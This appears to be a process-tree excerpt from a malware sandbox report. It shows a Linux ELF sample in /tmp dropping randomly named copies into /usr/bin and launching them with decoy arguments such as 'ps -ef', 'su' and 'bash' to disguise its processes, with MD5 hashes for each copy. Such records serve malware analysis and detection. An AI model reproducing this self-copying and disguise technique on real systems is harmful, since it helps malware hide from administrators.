                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:37
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:37
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:37
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:/usr/bin/jeyjdycnpv "cd /etc" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:/usr/bin/jeyjdycnpv ifconfig 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:/usr/bin/jeyjdycnpv "ps -ef" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:/usr/bin/jeyjdycnpv ls 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:/usr/bin/wutujskjnm "grep \"A\"" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:/usr/bin/wutujskjnm "echo \"find\"" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:/usr/bin/wutujskjnm su 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:/usr/bin/wutujskjnm su 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:/usr/bin/wutujskjnm top 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/wutujskjnm
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:890231c9558b66f036f3c8f7cebb5d72

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:/usr/bin/qxzsiorokf who 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:/usr/bin/qxzsiorokf sh 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:/usr/bin/qxzsiorokf "cd /etc" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:/usr/bin/qxzsiorokf "ps -ef" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:/usr/bin/qxzsiorokf "grep \"A\"" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:49
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/qxzsiorokf
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:d660d3565aa30310004c75f37e3fe19f

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:/usr/bin/uzqdvpyngy "netstat -antop" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:/usr/bin/uzqdvpyngy pwd 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:54
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:/usr/bin/uzqdvpyngy gnome-terminal 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:/usr/bin/uzqdvpyngy "ps -ef" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:/usr/bin/uzqdvpyngy bash 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:28:55
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uzqdvpyngy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:53241e7c3d48f7919dc80796d016a705

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:/usr/bin/bgoiqqymph "ls -la" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:/usr/bin/bgoiqqymph sh 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:/usr/bin/bgoiqqymph "sleep 1" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:/usr/bin/bgoiqqymph ifconfig 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:/usr/bin/bgoiqqymph who 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:00
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bgoiqqymph
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:36dfbcd1cb8fb95125af217877d82a82

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:/usr/bin/uhjkqkcgma pwd 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:/usr/bin/uhjkqkcgma "cd /etc" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:/usr/bin/uhjkqkcgma uptime 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:/usr/bin/uhjkqkcgma gnome-terminal 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
